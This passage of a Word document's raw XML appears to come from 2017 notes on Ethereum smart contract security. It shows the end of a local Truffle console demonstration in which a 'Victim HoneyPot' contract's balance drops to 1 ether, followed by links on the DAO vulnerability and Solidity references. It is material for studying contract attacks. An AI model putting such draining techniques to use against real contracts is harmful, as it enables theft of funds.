              <w:t>web3.eth.getBalance('0x30753e4a8aad7f8597332e813735def5dd395028').toString(10)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00F42A21">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>16000000000000000000</w:t>
            </w:r>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F42A21" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">truffle(develop)&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F42A21" w:rsidRDefault="00F42A21" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Victim </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>HoneyPot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> left with 1 Ethers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00173E7E" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>web3.eth.getBalance('0x9fbda871d559710256a2502a2517b794b482db40').toString(10)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00437919" w:rsidRDefault="00173E7E" w:rsidP="00173E7E">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:left="0"/>
            </w:pPr>
            <w:r>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00F42A21">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>1000000000000000000</w:t>
            </w:r>
            <w:r>
              <w:t>'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00437919" w:rsidRPr="0054731B" w:rsidRDefault="00437919" w:rsidP="002C17AD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005B7B0C" w:rsidRDefault="005B7B0C" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C43E2A" w:rsidRDefault="00C43E2A" w:rsidP="00C43E2A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>All that glitters are not Gold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C43E2A" w:rsidRDefault="00C43E2A" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C43E2A" w:rsidRDefault="00C5445E" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00C43E2A" w:rsidRPr="00F53037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.slock.it/siemens-ddo-the-first-fortune-500-company-using-the-dao-framework-2fd970b0b138</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C43E2A" w:rsidRDefault="00C43E2A" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C43E2A" w:rsidRDefault="00C5445E" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00C43E2A" w:rsidRPr="00F53037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://youtu.be/EJrPW3254wg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C43E2A" w:rsidRDefault="00C43E2A" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EA28C0" w:rsidRDefault="00C5445E" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00EA28C0" w:rsidRPr="005F502D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.ethereum.org/2016/06/17/critical-update-re-dao-vulnerability/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00EA28C0" w:rsidRDefault="00EA28C0" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00284182" w:rsidRDefault="00C5445E" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00284182" w:rsidRPr="009500AA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://etherscan.io/address/0xbb9bc244d798123fde783fcc1c72d3bb8c189413</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00284182" w:rsidRDefault="00284182" w:rsidP="00250C6B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00250C6B" w:rsidRDefault="00250C6B" w:rsidP="00FD328D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B1657A" w:rsidRDefault="00B1657A" w:rsidP="00B1657A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B1657A" w:rsidRDefault="00B1657A" w:rsidP="00A540EC"/>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="00C5445E" w:rsidP="009C2A4D">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="009C2A4D" w:rsidRPr="008348E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ethereum.stackexchange.com/questions/6707/whats-the-difference-between-call-value-and-call-value</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="009C2A4D" w:rsidP="009C2A4D"/>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="00C5445E" w:rsidP="009C2A4D">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="009C2A4D" w:rsidRPr="008348E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.blunderingcode.com/writing-secure-solidity/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="009C2A4D" w:rsidP="009C2A4D"/>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="00C5445E" w:rsidP="009C2A4D">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="009C2A4D" w:rsidRPr="008348E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ethereum.stackexchange.com/questions/7069/whats-the-point-of-sending-a-value-in-a-contract-deployment-transaction</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="009C2A4D" w:rsidP="009C2A4D"/>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="00C5445E" w:rsidP="009C2A4D">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="009C2A4D" w:rsidRPr="008348E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ethereum.stackexchange.com/questions/26838/how-to-get-the-creator-of-a-contract-was-the-owner</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="009C2A4D" w:rsidP="009C2A4D"/>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="00C5445E" w:rsidP="009C2A4D">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="009C2A4D" w:rsidRPr="008348E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ethereum.stackexchange.com/questions/11484/how-can-contract-ownership-be-transferred-from-one-account-to-another</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="009C2A4D" w:rsidP="009C2A4D"/>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="00C5445E" w:rsidP="009C2A4D">
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="009C2A4D" w:rsidRPr="008348E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ethereum.stackexchange.com/questions/1020/exception-in-contract-reverts-entire-stack-uses-all-gas</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="009C2A4D" w:rsidP="009C2A4D"/>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="00C5445E" w:rsidP="009C2A4D">
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="009C2A4D" w:rsidRPr="008348E2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://ethereum.stackexchange.com/questions/16200/fallback-function-is-not-getting-called</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="009C2A4D" w:rsidP="009C2A4D"/>
    <w:p w:rsidR="009C2A4D" w:rsidRDefault="009C2A4D" w:rsidP="00A540EC"/>
    <w:sectPr w:rsidR="009C2A4D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4FD7DB6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA481F7E"/>
    <w:lvl w:ilvl="0" w:tplc="E21C0F86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7D5D3D13"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF26AA0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hyphenationZone w:val="425"/>
  <w:noPunctuationKerning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12663"/>
    <w:rsid w:val="000B382D"/>
    <w:rsid w:val="00173E7E"/>
    <w:rsid w:val="00194157"/>
    <w:rsid w:val="001B7549"/>
    <w:rsid w:val="00226D37"/>
    <w:rsid w:val="00250C6B"/>
    <w:rsid w:val="00270444"/>
    <w:rsid w:val="00284182"/>
    <w:rsid w:val="002C17AD"/>
    <w:rsid w:val="00437919"/>
    <w:rsid w:val="00496FF4"/>
    <w:rsid w:val="004B3C57"/>
    <w:rsid w:val="00525C81"/>
    <w:rsid w:val="0054731B"/>
    <w:rsid w:val="00582AD8"/>
    <w:rsid w:val="005B7B0C"/>
    <w:rsid w:val="00656DCA"/>
    <w:rsid w:val="006F33D9"/>
    <w:rsid w:val="007928E3"/>
    <w:rsid w:val="008271D2"/>
    <w:rsid w:val="008C7AA0"/>
    <w:rsid w:val="009C2A4D"/>
    <w:rsid w:val="00A0529E"/>
    <w:rsid w:val="00A540EC"/>
    <w:rsid w:val="00A57128"/>
    <w:rsid w:val="00AB2B22"/>
    <w:rsid w:val="00B12663"/>
    <w:rsid w:val="00B1657A"/>
    <w:rsid w:val="00B60282"/>
    <w:rsid w:val="00C230B0"/>
    <w:rsid w:val="00C43E2A"/>
    <w:rsid w:val="00C53760"/>
    <w:rsid w:val="00C5445E"/>
    <w:rsid w:val="00CC2AB0"/>
    <w:rsid w:val="00EA28C0"/>
    <w:rsid w:val="00F149BE"/>
    <w:rsid w:val="00F42A21"/>
    <w:rsid w:val="00FD3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0A76497"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{548FB97C-3E7C-40DF-A221-6558A29D0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47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17A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C17A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328D"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="00250C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50C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bidi="ar-S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50C6B"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:lang w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m5872993646742632236gmail-name">
    <w:name w:val="m_5872993646742632236gmail-name"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00250C6B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m5872993646742632236gmail-operator">
    <w:name w:val="m_5872993646742632236gmail-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00250C6B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m5872993646742632236gmail-keyword">
    <w:name w:val="m_5872993646742632236gmail-keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00250C6B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="m5872993646742632236gmail-literal">
    <w:name w:val="m_5872993646742632236gmail-literal"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00250C6B"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000B382D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A540EC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54731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C17AD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C17A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C2A4D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140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89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93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11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6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4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6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5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1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24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7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1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0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7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34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1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5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8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07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80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3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5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8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7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3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7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1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0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0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5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6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5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45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264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505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EJrPW3254wg" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ethereum.stackexchange.com/questions/7069/whats-the-point-of-sending-a-value-in-a-contract-deployment-transaction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blog.slock.it/siemens-ddo-the-first-fortune-500-company-using-the-dao-framework-2fd970b0b138" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.blunderingcode.com/writing-secure-solidity/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ethereum.stackexchange.com/questions/16200/fallback-function-is-not-getting-called" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ethereum.stackexchange.com/questions/1020/exception-in-contract-reverts-entire-stack-uses-all-gas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ethereum.stackexchange.com/questions/6707/whats-the-difference-between-call-value-and-call-value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ethereum.stackexchange.com/questions/11484/how-can-contract-ownership-be-transferred-from-one-account-to-another" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://etherscan.io/address/0xbb9bc244d798123fde783fcc1c72d3bb8c189413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blog.ethereum.org/2016/06/17/critical-update-re-dao-vulnerability/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ethereum.stackexchange.com/questions/26838/how-to-get-the-creator-of-a-contract-was-the-owne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602</Words>
  <Characters>5655</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>235</Lines>
  <Paragraphs>1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mdocs</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6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astian LikKeung Ma</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sebastian Ma Lik Keung</cp:lastModifiedBy>
  <cp:revision>14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-12-03T05:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-04T02:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>